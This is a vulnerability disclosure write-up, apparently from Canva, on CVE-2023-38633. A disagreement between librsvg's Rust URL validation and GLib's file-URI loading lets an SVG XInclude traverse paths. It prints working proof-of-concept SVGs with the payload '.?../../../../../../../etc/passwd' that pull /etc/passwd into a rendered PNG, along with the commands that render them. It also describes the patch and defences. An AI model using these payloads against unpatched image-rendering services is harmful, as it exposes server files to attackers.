When URL parsers disagree (CVE-2023-38633)
Discovery and walkthrough of CVE-2023-38633 in librsvg, where two URL parser implementations (Rust and GLib) disagree on file scheme parsing, leading to path traversal.
As part of Canva's ongoing mission to build the world's most trusted platform, we continuously evaluate the security of our software dependencies. Identifying and resolving vulnerabilities in third-party dependencies helps improve the security of Canva, as well as the wider internet. Coupled with security controls like sandboxing, we continue to make it increasingly difficult for attackers to reach their objectives by exploiting third-party dependencies.
One such dependency Canva uses is librsvg (via libvips). We use librsvg to quickly render user-provided SVGs into thumbnails later displayed as PNGs. By exploiting differences in URL parsers when rendering an SVG with librsvg, we showed it's possible to include arbitrary files from disk in the resulting image. The librsvg maintainers quickly patched the issue, and it was assigned CVE-2023-38633.
We're sharing this research as another example of the dangers of mixing URL parsers, especially because the example we discovered is very subtle.
A special thanks to Federico (librsvg maintainer), John (libvips maintainer), and Lovell (Sharp maintainer) for their work and excellent coordinated response.
Prequel
The XML Parsing Issues in Inkscape in CLI write-up from Elttam's Victor Kahan shows how Inkscape is vulnerable to path traversal when rendering SVGs. Extending Victor's research, we found that while XInclude wasn't directly supported in Inkscape 0.9, it exhibited some interesting behavior when an SVG was nested in another SVG.
For example, consider the following inner SVG.
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <rect width="300" height="300" style="fill:rgb(255,204,204);" />
  <text x="0" y="100">
    <xi:include href="/etc/passwd" parse="text" encoding="ASCII">
      <xi:fallback>file not found</xi:fallback>
    </xi:include>
  </text>
</svg>
We encoded it as a URI and placed it inside another SVG, outer.svg.
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href=""/>
</svg>
When run with Inkscape 0.92.4, it produced an image where the XInclude fallback was triggered.
$ inkscape -f test.svg -e out.png -w 300
The fact that XInclude was supported at all was surprising because it can often lead to security vulnerabilities. While Inkscape isn't used by the Canva product, digging into the Inkscape code path showed that nested images are loaded with GdkPixbuf, which itself delegates SVG loading to librsvg. This was of great interest because librsvg is something that Canva does use.
XInclude
XInclude is a mechanism for merging XML documents, which can lead to security vulnerabilities when a user-provided XML document (like an SVG) is assembled or rendered on a server.
There are two standout elements in XInclude:
- xi:include to include the contents of a referenced URL, such as a file or HTTP request. The content being included can be plaintext or XML.
- xi:fallback to nominate content that should be rendered when the referenced content can't be loaded by xi:include.
Security checks aside, the following XML document loads the contents of /etc/passwd when processed.
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<example xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="/etc/passwd" parse="text" encoding="ASCII">
    <xi:fallback>file not found</xi:fallback>
  </xi:include>
</example>
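To make the include mechanism concrete, here is a minimal sketch using the XInclude support in Python's standard library. It isn't how librsvg or Inkscape process documents. The function names and the throwaway secret.txt file are assumptions made for the demonstration, and xi:fallback is left out to keep the example small.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def expand_xinclude(xml_text: str) -> str:
    """Expand xi:include elements and return the document's text content."""
    root = ET.fromstring(xml_text)
    # The default loader opens each href as a path on the local disk.
    ElementInclude.include(root)
    return "".join(root.itertext())


def demo() -> str:
    # A temporary file stands in for a sensitive file such as /etc/passwd.
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w", encoding="ascii") as fh:
            fh.write("root:x:0:0")
        doc = (
            '<example xmlns:xi="http://www.w3.org/2001/XInclude">'
            f'<xi:include href="{secret}" parse="text" encoding="ascii"/>'
            "</example>"
        )
        return expand_xinclude(doc)
```

Calling demo() returns the file's contents as part of the document text, which is why a processor that expands includes on untrusted input needs strict rules about which references it follows.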
There are rules
librsvg is a Rust library to render SVG images to Cairo surfaces. Most of the heavy lifting is now implemented in Rust, but the library relies on the Cairo and GNOME GLib C libraries.
From the prequel, we knew librsvg supported at least some of the XInclude standard. To understand how much, we dug into its implementation. As it turns out, every external URL reference in an SVG passes through a single method for validation. This includes references such as:
<image href="file:///something.png" />
<rect filter="url('file-with-filters.svg#my_filter')" />
<xi:include href="/etc/passwd" ... />
The librsvg url_resolver.resolve_href method implements some strict security checks to restrict what references can be loaded when processing an SVG document:
- All data: URLs are permitted because they can't reference external files by design.
- The referenced scheme must match the "current document" scheme. For example, when processing file:///foo/bar/example.svg, any encountered URL must be of the file: scheme.
- Encountered files must be in the same directory as the current document, or within a subdirectory of the current document. This is enforced by checking the URL path.
- All other schemes are rejected, including http:.
These strict rules are the reason our earlier naive XInclude tests failed. But we were very interested to see if we could bypass the rules. This could result in path traversal when processing an SVG, for example, including files like /etc/passwd in the PNG rendered from the SVG.
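As a rough illustration of the rules listed above, the following sketch approximates them with Python's urllib. It is not librsvg's implementation. The name is_allowed and the example paths are hypothetical, the current document is assumed to be a file: URL, and the on-disk canonicalization that librsvg also performs is left out.

```python
import posixpath
from urllib.parse import urljoin, urlsplit


def is_allowed(base_url: str, href: str) -> bool:
    """Approximate the rules above. Illustrative only, not librsvg's code."""
    resolved = urlsplit(urljoin(base_url, href))
    if resolved.scheme == "data":
        return True  # data: URLs are always permitted
    base = urlsplit(base_url)
    if base.scheme != "file" or resolved.scheme != "file":
        return False  # scheme mismatch, or a scheme such as http:
    # The target must sit in the document's directory or below it.
    base_dir = posixpath.dirname(base.path)
    target = posixpath.normpath(resolved.path)
    return posixpath.commonpath([base_dir, target]) == base_dir
```

With a current document at file:///srv/svg/current.svg, a reference to images/logo.png is accepted, while ../../etc/passwd and http://example.com/x.png are rejected. Note that the decision is based only on the path component this particular parser extracts.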
Parser Mismatch
Resolving a URL within an SVG document has two steps:
- Validate the URL as per the resolve rules mentioned earlier.
- If successful, load the contents, which parses URLs using Gio's inbuilt URI parser.
Excerpts from mod.rs and io.rs are as follows.
// xml/mod.rs
fn acquire(&self, href: Option<&str>, /* ... */) -> Result<(), AcquireError> {
    let aurl = self.url_resolver.resolve_href(href) // ...
    // ...
    self.acquire_text(&aurl, encoding);
}

fn acquire_text(&self, aurl: &AllowedUrl, encoding: Option<&str>) -> Result<(), AcquireError> {
    let binary = io::acquire_data(aurl, None);
    // ...
    return result;
}

// io.rs
pub fn acquire_data(aurl: &AllowedUrl, /* ... */) -> Result<BinaryData, IoError> {
    let uri = aurl.as_str();
    // ...
    let file = GFile::for_uri(uri);
    let (contents, _etag) = file.load_contents(cancellable)?;
    // ...
    return contents;
    // ...
}
Knowing there were two URL parsers at play (one to validate the URL and one to load the contents), to bypass the security checks, we needed to find URLs where the parsers disagreed.
With some quick tests, we mapped out how the URL parsers process different URLs.
Component of file:///etc/passwd?foo=bar#baz | Rust url parsed result |
---|---|
Scheme | file |
Host | None |
Path | /etc/passwd |
Query | foo=bar |
Fragment | baz |
Gio doesn't expose generic URL parsing (aside from GUri, which isn't on the callpath). However, the following table shows what g_filename_from_uri returns for some examples.
URL | g_filename_from_uri result |
---|---|
file:///etc/passwd?foo=bar#baz | /etc/passwd?foo=bar#baz Note: As of GLib commit 3986471, this now fails because of ? and # characters. |
file:///etc/passwd | /etc/passwd |
file:///etc/passwd&hello | /etc/passwd&hello |
file:///etc/passwd@host | /etc/passwd@host |
file://host/etc/passwd | /etc/passwd |
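The two tables can be reproduced in miniature. In this sketch, Python's urlsplit stands in for a parser that splits a URL into components, and naive_filename is a hypothetical function that mimics the behavior recorded in the second table: drop the scheme and host, keep everything else verbatim. Neither is the Rust url crate or GLib.

```python
from urllib.parse import urlsplit


def spec_style_parts(url: str) -> dict:
    """Split a URL into components, treating '?' and '#' as delimiters."""
    parts = urlsplit(url)
    return {
        "scheme": parts.scheme,
        "host": parts.netloc or None,
        "path": parts.path,
        "query": parts.query or None,
        "fragment": parts.fragment or None,
    }


def naive_filename(url: str) -> str:
    """Hypothetical stand-in: strip 'file://' and the host, keep the rest."""
    prefix = "file://"
    if not url.startswith(prefix):
        raise ValueError("not a file:// URL")
    rest = url[len(prefix):]       # "host/path" or "/path"
    return rest[rest.index("/"):]  # the '?' and '#' stay inside the filename
```

For file:///etc/passwd?foo=bar#baz, the first function reports the path as /etc/passwd, while the second returns /etc/passwd?foo=bar#baz. Any check made against the first value says little about the file the second one names.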
Bypassing Validation
With this understanding of how the URL parsers behaved, we took the relevant parts of librsvg and set up a fuzzing harness ("resolve") that runs the same URL resolution logic librsvg applies when it encounters a reference (href, XInclude, etc.) from an on-disk "current.svg" file. This allowed us to quickly test and fuzz inputs to see how the parsers and validation logic evaluated them. Some interesting outputs from fuzzing were as follows:
- resolve 'current.svg': Passes as expected.
- resolve '../../../../../../../etc/passwd': Canonicalization fails with 'No such file or directory'.
- resolve 'current.svg?../../../../../../../etc/passwd': Passes.
- resolve 'none/../current.svg': Passes as expected.
The last 2 results showed us that GFile::for_uri happily resolves path traversals, including path traversals in the query string. However, the second result, ../../../../../../../etc/passwd, failed because of the canonicalization check.
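The effect of a traversal hidden in the query string can be sketched as follows. The validator_path function models a parser that stops the path at '?'. The loader_path function is a hypothetical loader that keeps the query inside the path before collapsing '..' segments, which is an assumption modeled on the fuzzing results above rather than Gio's actual code. The base URL is also made up.

```python
import posixpath
from urllib.parse import urljoin, urlsplit

BASE = "file:///srv/svg/current.svg"  # hypothetical current document


def validator_path(href: str, base_url: str = BASE) -> str:
    """Path seen by a parser that treats '?' as the start of the query."""
    return urlsplit(urljoin(base_url, href)).path


def loader_path(href: str, base_url: str = BASE) -> str:
    """Path seen by a hypothetical loader that keeps '?...' in the path
    and then collapses '..' segments like a filesystem would."""
    parts = urlsplit(urljoin(base_url, href))
    raw = parts.path + ("?" + parts.query if parts.query else "")
    return posixpath.normpath(raw)
```

For the href current.svg?../../../../../../../etc/passwd, the validator sees /srv/svg/current.svg, which is inside the allowed directory. The loader treats "current.svg?.." as a single path segment, cancels it with the next "..", and keeps walking up until it lands on /etc/passwd.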
Bypassing Canonicalization
Part of librsvg's URL validation is to canonicalize the built URL to replace .. and . segments per regular filesystem path rules. It does this using Rust's std::fs::canonicalize (calling realpath), which returns an error if:
- The path doesn't exist.
- A non-final component in the path isn't a directory.
Because we don't always know the name of the 'current' SVG on disk, we needed to bypass canonicalization if we wanted to have a URL pass librsvg's validation. After some rapid testing, it turns out this is relatively straightforward.
$ realpath current.svg
/home/zsims/projects/librsvg-poc/current.svg
$ realpath .
/home/zsims/projects/librsvg-poc/
As it turns out, realpath(".") and std::fs::canonicalize(".") both return the "current directory". We can use this as a placeholder in our PoC instead of current.svg.
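The same behavior can be observed with Python's pathlib, whose strict resolve fails for missing paths much like realpath does. This is a small sketch, not the librsvg check. The canonicalize helper and the file names are hypothetical.

```python
from pathlib import Path


def canonicalize(base_dir: Path, href_path: str) -> Path:
    """Resolve href_path against base_dir. Raises FileNotFoundError
    if the resulting path doesn't exist."""
    return (base_dir / href_path).resolve(strict=True)
```

Given a directory that contains only current.svg, canonicalize(base, "current.svg") and canonicalize(base, ".") both succeed, while a guessed name such as unknown.svg raises FileNotFoundError. The "." form succeeds without any knowledge of the file names in the directory.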
Proof of concept
Knowing how the URL parsers mismatch, and how we can bypass canonicalization without knowing the current file name, we can build a payload to include /etc/passwd.
.?../../../../../../../etc/passwd
Within a poc.svg SVG, this looks like the following.
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <rect width="300" height="300" style="fill:rgb(255,204,204);" />
  <text x="0" y="100">
    <xi:include href=".?../../../../../../../etc/passwd" parse="text" encoding="ASCII">
      <xi:fallback>file not found</xi:fallback>
    </xi:include>
  </text>
</svg>
And produces the following result.
$ rsvg-convert poc.svg > poc.png
We get a similar result when running through vipsthumbnail.
Sensitive files within /proc, such as /proc/self/environ, failed because of character encoding.
$ rsvg-convert proc-poc.svg > proc-poc.png
thread 'main' panicked at 'str::ToGlibPtr<*const c_char>: unexpected '' character: NulError(21...
Note that this PoC only works where the SVG is loaded from a file:// URL. SVGs loaded through data: or resource: schemes are not vulnerable.
Patch
Following the report to librsvg's maintainer (see Issue 996), Federico patched the issue to add improved URL validation and use the validated URL as input into GFile. Part of the response from Federico included a heads-up to maintainers of Sharp and libvips to upgrade before the issue was disclosed publicly as CVE-2023-38633.
The issue also prompted some discussion about file URL parsing in glib, resulting in some additional validation in the library.
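One way to apply the idea of feeding only the validated value to the loader is sketched below. This is not the actual librsvg patch. The function name is hypothetical, and rejecting query strings and fragments outright is a design choice of this sketch.

```python
from urllib.parse import unquote, urlsplit


def path_from_validated_url(url: str) -> str:
    """Derive the filesystem path from the parsed URL so the loader never
    re-parses the raw string. Illustrative only."""
    parts = urlsplit(url)
    if parts.scheme != "file":
        raise ValueError("only file: URLs are handled in this sketch")
    if parts.netloc not in ("", "localhost"):
        raise ValueError("remote hosts are not supported")
    if parts.query or parts.fragment:
        # Anything a second parser might fold back into the path is refused.
        raise ValueError("query strings and fragments are rejected")
    return unquote(parts.path)
```

Because the loader receives a plain path computed by the same parser that performed the checks, there is no second interpretation of the URL left to disagree with the first.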
There were a few standouts from discovery and patching:
- The dangers of mixing URL parsers are just as applicable to file:// URLs and in-process use as they are for networked services and http:// URLs.
- file:// URLs are special. For example, the URL specification highlights support for query strings in file:// URLs, but the support in the implementations we reviewed varied greatly.
- Efforts to migrate existing C code to Rust are not without risk. Although memory safety is much improved, differences in contracts (like URL parsing) can have negative security consequences.
- Make sure you're only parsing URLs once, and using that parsed value from that point onwards.
- If possible, enforce your own validation on files, like SVGs, before processing further. This is why MediaWiki is not impacted by this issue: xi:include elements are rejected before the SVG reaches librsvg.
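A pre-processing check along the lines of the last point could look like the sketch below. It isn't how MediaWiki implements its filter. The function name is hypothetical, only the XInclude namespace used in this article is checked, and a hardened XML parser is assumed for truly untrusted input.

```python
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def contains_xinclude(svg_text: str) -> bool:
    """Return True if any element belongs to the XInclude namespace."""
    root = ET.fromstring(svg_text)
    prefix = "{" + XINCLUDE_NS + "}"
    return any(
        isinstance(el.tag, str) and el.tag.startswith(prefix)
        for el in root.iter()
    )
```

An upload pipeline could reject any SVG for which this returns True before handing the file to the renderer, so the renderer's own URL handling is never the only line of defense.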
Timeline
- July 11 2023: Issue discovered.
- July 12 2023: Reported to librsvg maintainers.
- July 19 2023: librsvg maintainers disclose to libraries that depend on librsvg, including libvips and Sharp.
- July 21 2023: librsvg patched by maintainers.
- July 22 2023: CVE-2023-38633 issued.